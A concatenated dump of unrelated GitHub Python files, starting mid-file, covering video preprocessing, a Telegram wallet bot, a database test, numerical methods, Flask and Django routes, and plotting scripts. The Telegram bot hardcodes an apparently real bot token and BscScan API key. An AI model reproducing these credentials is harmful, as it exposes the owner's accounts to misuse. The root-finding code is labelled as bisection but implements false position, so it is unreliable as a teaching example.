OLD_DIR to ensure you have put it in the write directory\r\n\r\nimport wave\r\nimport os\r\nimport librosa\r\nimport librosa.display\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2\r\n\r\nNEW_DIR = './video_3frames'\r\nOLD_DIR = './videos/solo' \r\nBLOCK_TIME = 66302/11000\r\nSAMPLE_RATE = 11000\r\nFPS = 24\r\nBLOCK_LENGTH = math.floor(BLOCK_TIME*FPS)\r\nFRAME_INDEX = [0,math.floor((BLOCK_LENGTH-1)/2),BLOCK_LENGTH-1]\r\n\r\nfrequencies = np.linspace(SAMPLE_RATE/2/512,SAMPLE_RATE/2,512)\r\nlog_freq = np.log10(frequencies)\r\nsample_freq = np.linspace(log_freq[0],log_freq[-1],256)\r\nsample_index = [np.abs(log_freq-x).argmin() for x in sample_freq]\r\n# prepare for log resample\r\n\r\nif os.path.exists(NEW_DIR) == False:\r\n\tos.mkdir(NEW_DIR)\r\n\r\ninstrument_class = os.listdir(OLD_DIR)\r\nfor instrument in instrument_class:\r\n\tif os.path.exists(os.path.join(NEW_DIR,instrument)) == False:\r\n\t\tos.mkdir(os.path.join(NEW_DIR,instrument))\r\n\tfiles_dir = os.path.join(OLD_DIR,instrument)\r\n\tfiles = os.listdir(files_dir)\r\n\tfor file in files:\r\n\t\tcap = cv2.VideoCapture(os.path.join(files_dir,file))\r\n\t\tframeCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n\t\tframeWidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n\t\tframeHeight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\t\tblock_num = math.floor(frameCount/BLOCK_LENGTH)\r\n\t\torder = file[:-4]\r\n\t\tdestnation = os.path.join(NEW_DIR,instrument,order)\r\n\t\tbuf = np.empty((frameCount, frameHeight, frameWidth, 3), np.dtype('uint8'))\r\n\t\tfc = 0\r\n\t\tret = True\r\n\t\twhile (fc < frameCount and ret):\r\n\t\t\tret, buf[fc] = cap.read()\r\n\t\t\tfc += 1\r\n\t\tcap.release()\r\n\t\tif os.path.exists(destnation) == False:\r\n\t\t\tos.mkdir(destnation)\r\n\t\tfor i in range(block_num):\r\n\t\t\ttemp = buf[i*BLOCK_LENGTH:(i+1)*BLOCK_LENGTH,:,:,:]\r\n\t\t\tresult = temp[FRAME_INDEX,:,:,:]\r\n\t\t\tfinal = np.empty((len(FRAME_INDEX),224,224,3),np.dtype('uint8'))\r\n\t\t\tfor p in range(0,len(FRAME_INDEX)):\r\n\t\t\t\tfinal[p,:,:,:]=cv2.resize(result[p,:,:,:],(224,224))\r\n\t\t\tnp.save(os.path.join(destnation,str(i)),final)\r\n\t\t\t#exit()\r\n\r\n\t\t\t# save the wave 
segment\r\n\t\t\t#librosa.output.write_wav(os.path.join(destnation,str(i)+'.wav'),data,sr) \r\n","repo_name":"IrisLi17/Sound_of_Pixels","sub_path":"util/video_pretreat.py","file_name":"video_pretreat.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"72616202961","text":"import json\nimport requests\nfrom telegram import *\nfrom telegram.ext import *\nfrom datetime import datetime\nfrom itertools import islice\n\n\n# Telegram bot token\ntoken='5409758372:AAGCPq3_S0oCLIwS8oCVME5DBJ7ThZCIH68'\n# bot = Bot(token)\n\ndef sample_responses(input_text):\n address = str(input_text).lower()\n print(details(address))\n return details(address)\n\ndef start_command(update, context):\n update.message.reply_text('Type in your wallet address to get started!')\n\ndef help_command(update, context):\n help_text = \"This bot sends you the recent 10 BSC tokens received in your wallet\"\n update.message.reply_text(help_text)\n\n\ndef handle_message(update, context):\n text = str(update.message.text).lower()\n response = sample_responses(text)\n update.message.reply_text(response)\n\ndef error(update, context):\n print(f\"Update {update} caused error {context.error}\")\n\n\ndef main():\n updater = Updater(token, use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n dp.add_handler(CommandHandler(\"help\", help_command))\n\n dp.add_handler(MessageHandler(Filters.text, handle_message))\n\n dp.add_error_handler(error)\n\n updater.start_polling()\n updater.idle()\n\ndef details(address):\n API_KEY = \"D3XPR53MHTF8YI3W71YHI923V9MC4HW4XM\"\n\n url = f'https://api.bscscan.com/api?module=account&action=tokentx&address={address}&startblock=0&endblock=99999999&sort=desc&apikey={API_KEY}'\n response = requests.get(url)\n data = json.loads(response.text)\n all_details = \"\"\n # Check for new transactions\n for tx in islice(data['result'], 10):\n if tx['to'] == address:\n BASE_CONVERT_RATE = 10 ** 18\n value = int(tx['value']) / BASE_CONVERT_RATE\n token_name = tx['tokenName']\n timestamp = int(tx['timeStamp'])\n\n # convert timestamp to datetime object\n date_time = datetime.fromtimestamp(timestamp)\n\n # print the date\n token_date = str(date_time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n details = f'Token: {token_name}\\nValue: {value}\\nDate received: {token_date}'\n all_details += \"Transaction details!\\n\" + details + \"\\n\\n\"\n # Send message to Telegram user\n # bot.send_message(chat_id=chat_id, text=all_details)\n return all_details\n\nif __name__ == '__main__':\n print(\"Bot started...\")\n main()\n","repo_name":"AustinChris1/crypto-telegram-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14436539407","text":"import sys\nimport unittest\nsys.path.append(sys.path[0]+\"/../\")\nfrom yat.test import macro\nfrom yat.test import Node\nfrom testcase.utils.Logger import Logger\nfrom testcase.utils.Constant import Constant\nfrom testcase.utils.CommonSH import CommonSH\n\n\nlogger = Logger()\ncommonsh = CommonSH('PrimaryDbUser')\nconstant = Constant()\n\nclass GUC_SC(unittest.TestCase):\n def setUp(self):\n logger.info('------------------------Opengauss_Function_Guc_Synchronous_Commit_Case0006开始执行-----------------------------')\n self.userNode = Node('PrimaryDbUser')\n self.DB_ENV_PATH = macro.DB_ENV_PATH\n 
self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH\n self.sh_primy = CommonSH('PrimaryDbUser')\n self.Constant = Constant()\n\n def test_synchronous_commit(self):\n # 查看参数默认值(off)且创建系统管理员和数据库\n sql_cmd1 = commonsh.execut_db_sql(f'''show synchronous_commit;\n drop user if exists test1_sys006 cascade;\n create user test1_sys006 with sysadmin password '{macro.COMMON_PASSWD}';\n drop database if exists testdb_006;\n create database testdb_006;''')\n logger.info(sql_cmd1)\n flag = (constant.SYNCHRONOUS_COMMIT_DEFAULT[0] in sql_cmd1 or constant.SYNCHRONOUS_COMMIT_DEFAULT[1] in sql_cmd1)\n self.assertTrue(flag)\n self.assertIn(constant.CREATE_ROLE_SUCCESS_MSG, sql_cmd1)\n self.assertIn(constant.CREATE_DATABASE_SUCCESS, sql_cmd1)\n # 系统管理员使用alter database命令修改参数为2;修改成功,未退出会话,查看参数值,未生效\n sql_cmd2 = ('''alter database testdb_006 set synchronous_commit to 2;\n show synchronous_commit;''')\n excute_cmd1 = f'''\n source {self.DB_ENV_PATH};\n gsql -d testdb_006 -p {self.userNode.db_port} -U test1_sys006 -W '{macro.COMMON_PASSWD}' -c \"{sql_cmd2}\"\n '''\n logger.info(excute_cmd1)\n msg1 = self.userNode.sh(excute_cmd1).result()\n logger.info(msg1)\n self.assertIn(constant.ALTER_DATABASE_SUCCESS_MSG, msg1)\n flag = (constant.SYNCHRONOUS_COMMIT_DEFAULT[0] in msg1 or constant.SYNCHRONOUS_COMMIT_DEFAULT[1] in msg1)\n self.assertTrue(flag)\n # 重新连接数据库,查看参数值,参数值生效,为remote_apply\n sql_cmd4 = (''' show synchronous_commit;''')\n excute_cmd1 = f'''\n source {self.DB_ENV_PATH};\n gsql -d testdb_006 -p {self.userNode.db_port} -c \"{sql_cmd4}\"\n '''\n logger.info(excute_cmd1)\n msg1 = self.userNode.sh(excute_cmd1).result()\n logger.info(msg1)\n self.assertIn('remote_apply',msg1)\n\n # 清理环境\n def tearDown(self):\n logger.info('----------this is teardown-------')\n # 恢复参数为默认值\n sql_cmd5 = commonsh.execut_db_sql('''ALTER DATABASE testdb_006 RESET synchronous_commit;''')\n logger.info(sql_cmd5)\n # 删除用户\n sql_cmd6 = commonsh.execut_db_sql('''drop user test1_sys006 cascade;\n drop database if exists testdb_006; ''')\n logger.info(sql_cmd6)\n logger.info('------------------------Opengauss_Function_Guc_Synchronous_Commit_Case0006执行结束--------------------------')\n","repo_name":"chezming/opengauss_Yat","sub_path":"openGaussBase/testcase/GUC/WAL/Opengauss_Function_Guc_Synchronous_Commit_Case0006.py","file_name":"Opengauss_Function_Guc_Synchronous_Commit_Case0006.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26845388185","text":"## Bisection Method using Python.\nimport math as mth\n\n# Initialize the function \ndef bisect(f: int, xl: int, xr: int, minimum_error: int, max_iter: int):\n \"\"\"Calculating the root of the given function\n\n Args:\n f (int): The root we're finding\n xl (int): Lower boundary\n xr (int): Higher boundary\n minimum_error (int): Pre-specified tolerance that satisfy the condition\n max_iter (int): Optional\n\n Returns:\n xm: Return the root of the equation\n \"\"\"\n\n # Initalize variables\n i = 1 \n\n # table header\n print(\"{:<4} {:<15} {:<15} {:<15} {:<15} {:<15} {:<15} {:<15}\".format(\n \"i\", \"xl\", \"xr\", \"xm\", \"f(xl)\", \"f(xr)\", \"f(xn)\", \"Relative Approx Error\"\n ))\n\n # Iterate until the max_iter or the relative approx error is satisfied.\n while i <= max_iter:\n # Calculate the midpoint\n xn = (xr * f(xl) - xl * f(xr))/(f(xl) - f(xr))\n\n # calculate the f(xm) to compare the values\n fxn = f(xn)\n\n # Calculate the approx errord\n\n if i > 1:\n ea = abs((xn - x_old) / xn)\n 
else:\n ea = 100.0 # set it to the high\n\n # print the current values and then update\n print(\"{:<4} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5%}\".format(\n i, xl, xr, xn, f(xl), f(xr), fxn, ea\n ))\n\n if fxn == 0 or ea < minimum_error:\n break\n\n\n # Update the boundary \n # Assuming the f(xl) is negative and fxn is positive\n if f(xl) < 0 and fxn > 0:\n xr = xn\n else:\n xl = xn\n\n # update the xm\n x_old = xn\n\n # Increment\n i += 1\n\n return xn\n \n\n\ndef f(x): #Function that we want to solve\n return x**2 - 23\n\n\n# Determine the root of the equation. F(x) = sin5x + cos2x, with minimum 5% approx error.\n# Interval of [-0.525, -0.51875]\n\nxl = 3\nxr = 6\nminimum_error = 0.05\nmax_iter = 50\n\nroot = bisect(f, xl, xr, minimum_error, max_iter)\n\nprint(f\"The root is: {root:.5f}\")\n","repo_name":"javaldrnld/uni","sub_path":"Numerical Code/Python/falseposition.py","file_name":"falseposition.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17078372264","text":"from django.conf.urls import url\nfrom greenhouse_app import views\nurlpatterns = [#url(''),\n url(r'^$', views.index, name='index'),\n url(r'^measurements/getSensorsData/', views.getSensorsData, name='getSensorsData'),\n url(r'^measurements/getLastSensorValues/', views.getLastSensorValues, name='getLastSensorValues'),\n url(r'^measurements/downloadMeasurements/', views.downloadMeasurements, name='downloadMeasurements'),\n url(r'^measurements/', views.measurements, name='measurements'),\n url(r'^relays/getRelaysState/', views.getRelaysState, name='getRelaysState'),\n url(r'^manualMode/reloadConfiguration/', views.reloadConfiguration, name='reloadConfiguration'),\n url(r'^manualMode/runAction/', views.runAction, name='runAction'),\n url(r'^manualMode/setManualMode/', views.setManualMode, name='setManualMode'),\n url(r'^manualMode/', views.manualMode, name='manualMode'),\n url(r'^graphs/getGraphData', views.getGraphData, name='getGraphData'),\n url(r'^graphs/', views.graphs, name='graphs'),\n url(r'^camera/savePicture/', views.savePicture, name='savePicture'),\n url(r'^camera/', views.camera, name='camera'),\n url(r'^setConfiguration/', views.setConfiguration, name='setConfiguration'),\n url(r'^getKeepAlive/', views.getKeepAliveValues, name='getKeepAlive'),\n ]\n\n\n\n\n","repo_name":"netanelf/greenhouse_controller","sub_path":"web/greenhouse_django_project/greenhouse_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19336272091","text":"#!/usr/bin/env python3\n# get_gene_level_information.py\n'''\nGetting data from the Unigene database Links to an external site.\n'''\nimport sys\nimport re\nimport argparse\nfrom config import config\nfrom config import io_utils\n\n\ndef main():\n \"\"\"Business Logic\"\"\"\n\n # get the host and gene name\n args = get_file_args()\n host_name = args.host\n gene_name = args.gene\n\n # standardize the input host name\n updated_host_name = update_host_name(host_name)\n\n # get the full file path\n file = \"/\".join((config.get_directory_for_unigene(),\n updated_host_name, gene_name + \".\" + config.get_extension_for_unigene()))\n\n # check for the existence of file\n if io_utils.is_gene_file_valid(file):\n # using f-strings\n print(f\"\\nFound Gene {gene_name} for {updated_host_name.replace('_', ' ')}\")\n else:\n print(\"Not 
found\")\n print(f\"Gene {gene_name} does not exist for {updated_host_name}. exiting now...\", file=sys.stderr)\n sys.exit(1)\n\n # get the filehandle\n file_handle = io_utils.get_filehandle(file, \"r\")\n\n # get the data information of target gene\n extracted_tissue_list = get_data_for_gene_file(file_handle)\n\n # print the results\n print_host_to_gene_name_output(updated_host_name, gene_name, extracted_tissue_list)\n\n\ndef update_host_name(host_name) -> str:\n \"\"\"\n This function take the host name and checks for the available conversions \\\n from common to scientific names and return the scientific name\n \"\"\"\n update_name = host_name.lower().replace('_', ' ')\n check_dict = config.get_keywords_for_hosts()\n if update_name in check_dict.keys():\n return check_dict[update_name]\n else:\n _print_directories_for_hosts()\n sys.exit(1)\n\n\ndef get_file_args():\n \"\"\"\n Just get the command line options using argparse\n @return: Instance of argparse arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Give the Host and Gene name')\n\n parser.add_argument('--host',\n dest='host',\n type=str,\n help='Name of Host',\n default='Human')\n\n parser.add_argument('-g', '--gene',\n dest='gene',\n type=str,\n help='Name of Gene',\n default='A1BG')\n\n return parser.parse_args()\n\n\ndef _print_directories_for_hosts():\n \"\"\"\n to alert the user what directories do exist (see outputs below) and the exit the program.\n \"\"\"\n print(f'\\n\\nEither the Host Name you are searching for is not in the database\\\n \\n\\nor If you are trying to use the scientific name please put the name in double quotes:\\\n \\n\\n\"Scientific name\"\\\n \\n\\nHere is a (non-case sensitive) list of available Hosts by scientific name\\n\\\n ')\n check_dict = config.get_keywords_for_hosts()\n set_value = sorted(set(check_dict.values()))\n count_value = 1\n for value in set_value:\n print(f\"{count_value:>3d}. {value}\")\n count_value += 1\n\n print('\\n\\n\\nHere is a (non-case sensitive) list of available Hosts by common name\\n')\n\n count_key = 1\n for value in check_dict:\n print(f\"{count_key:>3d}. {value[0].upper()}{value[1:].lower()}\")\n count_key += 1\n\n\ndef get_data_for_gene_file(file_handle):\n \"\"\"\n extracts the list of tissues in which this gene is expressed and returns a sorted list of the tissues.\n \"\"\"\n for line in file_handle:\n match = re.search('^EXPRESS(.*)', line)\n if match:\n tissue_string = match.group(1)\n tissue_list = tissue_string.lstrip().split('|')\n for tissue in tissue_list:\n index = tissue_list.index(tissue)\n tissue_list[index] = tissue.lstrip().rstrip()\n tissue_list_sorted = sorted(tissue_list)\n\n return tissue_list_sorted\n\n\ndef print_host_to_gene_name_output(host_name, gene_name, data_from_gene_file):\n \"\"\"\n This function should print the tissue expression data for the gene.\n \"\"\"\n updated_host_name = host_name.replace(\"_\", \" \")\n print(f\"In {updated_host_name}, There are {len(data_from_gene_file)} tissues that {gene_name} is expressed in:\\n\")\n count = 1\n for tissue in data_from_gene_file:\n print(f\"{count:>3d}. 
{tissue[0].upper()}{tissue[1:].lower()}\")\n count += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chenxi-gao/workSample","sub_path":"Bioinformatics_Tool_Suite/get_gene_level_information/get_gene_level_information.py","file_name":"get_gene_level_information.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5337353385","text":"import streamlit as st\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.express as px\r\nfrom matplotlib.patches import Rectangle\r\n\r\n\r\ndef visualization_missingvalue(df):\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n fig, axs = plt.subplots(1, 1, figsize=(10, 7.5))\r\n plt1 = sns.heatmap(nan_data_numerical, annot=True, cmap=colors, ax=axs)\r\n #axs.set_title('Numerical Columns\\n',fontweight = 'bold',fontsize=15)\r\n plt.suptitle('MISSING VALUES \\n PER COLUMN\\n',\r\n fontsize=20, fontweight='bold')\r\n plt.tight_layout()\r\n st.write('\\n')\r\n st.pyplot(fig)\r\n\r\n\r\ndef visualization_comparison(df):\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n data = df.copy()\r\n list_nan_features = list(\r\n nan_data_numerical[nan_data_numerical[0] > 0].index)\r\n for col in list_nan_features:\r\n data[col] = data[col].replace(np.nan, data[col].median())\r\n fig = plt.figure(figsize=(10, 6))\r\n ax = sns.countplot(data['potability'],\r\n order=data['potability'].value_counts().index)\r\n\r\n # Create annotate\r\n for i in ax.patches:\r\n ax.text(x=i.get_x()+i.get_width()/2, y=i.get_height()/7, s=f\"{np.round(i.get_height()/len(data)*100,0)}%\",\r\n ha='center', size=50, weight='bold', rotation=90, color='white')\r\n for p in ax.patches:\r\n ax.annotate(format(p.get_height(), '.0f'),\r\n (p.get_x() + p.get_width() / 2., p.get_height()),\r\n ha='center',\r\n va='center',\r\n xytext=(0, 10),\r\n textcoords='offset points')\r\n\r\n plt.title(\"Comparison of Potable and Not Potable Samples \\n\",\r\n size=15, weight='bold')\r\n plt.annotate(text=\"Not safe water for human consumption\", xytext=(0.5, 1790), xy=(0.2, 1250),\r\n arrowprops=dict(arrowstyle=\"->\", color='blue', connectionstyle=\"angle3,angleA=0,angleB=90\"), color='black')\r\n plt.annotate(text=\"Safe water for human consumption\", xytext=(0.8, 1600), xy=(1.2, 1000),\r\n arrowprops=dict(arrowstyle=\"->\", color='blue', connectionstyle=\"angle3,angleA=0,angleB=90\"), color='black')\r\n\r\n # Setting Plot\r\n sns.despine(right=True, top=True, left=True)\r\n ax.axes.yaxis.set_visible(False)\r\n st.pyplot(fig)\r\n\r\n\r\ndef visualization_distribution(df):\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n data = df.copy()\r\n list_nan_features = list(\r\n nan_data_numerical[nan_data_numerical[0] > 0].index)\r\n for col in list_nan_features:\r\n data[col] = data[col].replace(np.nan, data[col].median())\r\n\r\n cols = data.columns[0:9].to_list()\r\n 
min_val = [6.5, 60, 500, 0, 3, 200, 0, 0, 0]\r\n max_val = [8.5, 120, 1000, 4, 250, 400, 10, 80, 5]\r\n limit = pd.DataFrame(data=[min_val, max_val], columns=cols)\r\n\r\n fig, ax = plt.subplots(nrows=3, ncols=3, figsize=(\r\n 15, 15), constrained_layout=True)\r\n plt.suptitle(\r\n 'Feature distribution by Potability class and Approved limit', size=20, weight='bold')\r\n ax = ax.flatten()\r\n for x, i in enumerate(cols):\r\n sns.kdeplot(data=data, x=i, hue='potability', ax=ax[x], fill=True, multiple='stack', alpha=0.5,\r\n linewidth=0)\r\n l, k = limit.iloc[:, x]\r\n print(ax[x].add_patch(Rectangle(xy=(l, 0), width=k-l, height=1, alpha=0.5)))\r\n for s in ['left', 'right', 'top', 'bottom']:\r\n ax[x].spines[s].set_visible(False)\r\n print(fig.show())\r\n\r\n # st.pyplot(fig)\r\n","repo_name":"budisumandra/water_potability_prediction","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19402053442","text":"n, l = input().split()\nn = int(n)\nl = int(l)\nscore = input().split()\n\nfor i in range(len(score)):\n score[i] = int(score[i])\n\nfor i in range(l):\n op, a, b = input().split()\n a = int(a)\n b = int(b)\n if op == \"U\":\n score[a-1] = b\n if op == \"Q\":\n if a > b:\n a, b = b, a\n elif a == b:\n print(score[a-1])\n continue\n\n print(max(score[a - 1:b]))\n","repo_name":"lryself/python_learning","sub_path":"project_demo/huaweiTerm/s2016/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34752640572","text":"# Write a function, connected_components_count, that takes in the adjacency list of an undirected graph. 
The function should return the number of connected components within the graph.\n\n# input: adj list of undirected graph\n# output: number of connected components within graph\n# create helper function depth_traversal to traverse through graph pass in graph, set and node\n# create comp_num to count components\n# create visited variable to hold set of visited nodes\n# for loop to iterate through nodes of graph\n# if node not in visited set call depth_traversal func then increment comp_num\n# outside for loop return comp_num \n\n# helper function for graph traversal\ndef depth_traversal(graph, visited, node):\n stack = [node]\n\n while stack:\n current = stack.pop()\n\n for neighbor in graph[current]:\n if neighbor not in visited:\n stack.append(neighbor)\n visited.add(neighbor)\n\n# iterative solution\n# time O(e) for each edge travelled\n# space O(n) for creating set and stack which would be 2n\ndef connected_components_count(graph):\n if graph is None:\n return 0\n\n visited = set()\n comp_num = 0\n \n # node is each key of the graph which is essentially each node\n for node in graph:\n if node not in visited:\n visited.add(node)\n depth_traversal(graph, visited, node)\n comp_num += 1\n\n return comp_num\n\nprint(connected_components_count({\n 0: [8, 1, 5],\n 1: [0],\n 5: [0, 8],\n 8: [0, 5],\n 2: [3, 4],\n 3: [2, 4],\n 4: [3, 2]\n})) # -> 2","repo_name":"Jblancs/DSA","sub_path":"structy/matrix/3-connected-components-count.py","file_name":"3-connected-components-count.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13436268194","text":"from flask import Blueprint\n\nfrom server.data_access.follows import get_followees_by_user_id\nfrom server.data_access.equity_order import get_equity_orders_by_user_ids\nfrom server.data_access.user import get_user_info_by_user_ids\nfrom server.constants import OrderType\nfrom server.util.logo import get_logo_url_for_company\nfrom server.util.time import get_time_since_post\n\n\n# Defining a blue print for all URLs that begin with /.\n# All views that are related to portfolio should be registered with\n# this blueprint and this blueprint will in turn be registred\n# with the flask application\nfeed_bp = Blueprint(\"feed_bp\", __name__, url_prefix=\"/feed\")\n\nPAGINATION_SIZE = 25\n\n\n@feed_bp.route(\"/<int:user_id>\")\ndef get_feed_for_user(user_id: int):\n \"\"\"Return the transactions a user should see on their feed\"\"\"\n # Get the list of all users that this user is following and retrieve their\n # user information\n followee_ids = get_followees_by_user_id(user_id)\n user_info = get_user_info_by_user_ids(followee_ids)\n user_id_to_user_info = {user.id: user for user in user_info}\n\n # Get the transactions for the list of followers and format the response\n transactions = get_equity_orders_by_user_ids(followee_ids)\n sorted_transactions = sorted(\n transactions, key=lambda x: x.created_at, reverse=True,\n )\n\n # Pagination:\n # If a list is supposed to have a finite number of entries, we should\n # return all entries. 
But if at any point, we can have a situation\n # where the number of items returned can be infinite, we should use\n # paging.\n #\n # How can clients request pages?\n # Query strings are commonly used for paging in the following way:\n # /api/sites?page=1&page_size=25\n # You could make an argument for page_size being controlled by the backend\n # but you might also want to give that flexibility to the client\n #\n # Example response with page information:\n # {\n # totalResults: 255,\n # nextPage: \"api/sites?page=5\"\n # prevPage: \"api/sites?page=5\"\n # results: [...]\n # }\n #\n # You can also choose to send the paging details back in the header instead\n # of the body\n return {\n \"transactions\": [\n {\n \"user_id\": transaction.user_id,\n \"firstName\": user_id_to_user_info[transaction.user_id].first_name,\n \"lastName\": user_id_to_user_info[transaction.user_id].last_name,\n \"ticker\": transaction.ticker.ticker,\n \"tickerLogo\": get_logo_url_for_company(transaction.ticker.company_name),\n \"orderType\": OrderType(int(transaction.order_type)).name,\n \"price\": transaction.price,\n \"quantity\": transaction.quantity,\n \"createdAt\": get_time_since_post(transaction.created_at),\n }\n for transaction in sorted_transactions[:PAGINATION_SIZE]\n ],\n \"page\": 1,\n \"count\": len(sorted_transactions[:PAGINATION_SIZE]),\n \"total_items\": len(sorted_transactions),\n }\n","repo_name":"gkeswani92/stock-portfolio","sub_path":"server/views/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2468828845","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom os import makedirs, path, listdir\nfrom random import randint\nfrom skimage import io, transform\nimport json\nimport argparse\nimport sys\n\n\"\"\" Usage:\n To plot a model's scanpath on a given image:\n plot_scanpath.py -dataset <dataset_name> -img <image_name> -model <model_name>\n To plot a (random) human subject's scanpath on a given image:\n plot_scanpath.py -dataset <dataset_name> -img <image_name> -human\n\"\"\"\n\n\"\"\" The main method of this script (plot_scanpath) belongs to https://github.com/cvlab-stonybrook/Scanpath_Prediction/plot_scanpath.py \"\"\"\n\nDATASETS_DIR = '../Datasets'\nRESULTS_DIR = '../Results'\n\ndef plot_scanpath(img, xs, ys, fixation_size, bbox, title, save_path):\n fig, ax = plt.subplots()\n ax.imshow(img, cmap=plt.cm.gray)\n initial_color = 'red'\n scanpath_color = 'yellow'\n\n for i in range(len(xs)):\n if i > 0:\n plt.arrow(xs[i - 1], ys[i - 1], xs[i] - xs[i - 1], ys[i] - ys[i - 1], width=3, color=scanpath_color, alpha=0.5)\n\n for i in range(len(xs)):\n if i == 0:\n face_color = initial_color\n else:\n face_color = scanpath_color\n circle = plt.Circle((xs[i], ys[i]),\n radius=fixation_size[1] // 2,\n edgecolor='red',\n facecolor=face_color,\n alpha=0.5)\n ax.add_patch(circle)\n plt.annotate(\"{}\".format(i + 1), xy=(xs[i], ys[i] + 3), fontsize=10, ha=\"center\", va=\"center\")\n\n # Draw target's bbox\n rect = Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], alpha=0.7, edgecolor='red', facecolor='none', linewidth=2)\n ax.add_patch(rect)\n\n # To draw grid, useful for plotting nnIBS's scanpaths\n # box_size = 32\n # box_x = 0\n # box_y = 0\n # rows = round(img.shape[0] / box_size)\n # columns = round(img.shape[1] / box_size)\n # for row in range(rows):\n # box_y = box_size * row\n # for column in range(columns):\n # box_x = box_size * 
column\n # rect = Rectangle((box_x, box_y), box_size, box_size, alpha=0.5, edgecolor='yellow', facecolor='none', linewidth=2)\n # ax.add_patch(rect)\n\n\n ax.axis('off')\n ax.set_title(title)\n\n plt.savefig(path.join(save_path, title + '.png'))\n plt.show()\n plt.close()\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-model', type=str, help='Name of the visual search model')\n group.add_argument('-human', nargs='?', const=True, default=False, help='ID of human subject to plot; leave blank to plot a scanpath generated by a random subject (who has found the target)')\n parser.add_argument('-dataset', type=str, help='Name of the dataset')\n parser.add_argument('-img', type=str, help='Name of the image on which to draw the scanpath (write \\'notfound\\' to plot target not found images')\n\n args = parser.parse_args()\n return args\n\ndef get_trial_info(image_name, trials_properties):\n for trial in trials_properties:\n if trial['image'] == image_name:\n return trial \n\n raise NameError('Image name must be in the dataset')\n\ndef rescale_coordinate(value, old_size, new_size, fixation_size=None, is_grid=False):\n if is_grid:\n # Rescale fixation to center of the cell in the grid\n return value * fixation_size + (fixation_size // 2)\n else:\n return (value / old_size) * new_size\n\ndef load_dict_from_json(json_file_path):\n if not path.exists(json_file_path):\n return {}\n else:\n with open(json_file_path, 'r') as json_file:\n return json.load(json_file)\n\ndef process_image(img_scanpath, subject, image_name, dataset_name, trial_info, images_path):\n fixation_size = (img_scanpath['receptive_height'], img_scanpath['receptive_width'])\n scanpath_img_size = (img_scanpath['image_height'], img_scanpath['image_width'])\n\n image_file = path.join(images_path, image_name)\n img = io.imread(image_file)\n img_size_used = scanpath_img_size\n original_img_size = img.shape[:2]\n\n is_grid = False\n # nnIBS uses a grid for images, it's necessary to upscale it\n if 'IBS' in subject:\n is_grid = True\n img_size_used = (768, 1024)\n fixation_size = (img_size_used[0] // scanpath_img_size[0], img_size_used[1] // scanpath_img_size[1])\n\n img = transform.resize(img, img_size_used)\n # Rescale scanpath if necessary\n X = [rescale_coordinate(x, scanpath_img_size[1], img_size_used[1], fixation_size[1], is_grid) for x in img_scanpath['X']]\n Y = [rescale_coordinate(y, scanpath_img_size[0], img_size_used[0], fixation_size[0], is_grid) for y in img_scanpath['Y']]\n\n bbox = img_scanpath['target_bbox']\n\n if is_grid:\n bbox[0], bbox[2] = [rescale_coordinate(pos, original_img_size[0], scanpath_img_size[0], fixation_size[0], is_grid) for pos in (bbox[0], bbox[2])]\n bbox[1], bbox[3] = [rescale_coordinate(pos, original_img_size[1], scanpath_img_size[1], fixation_size[1], is_grid) for pos in 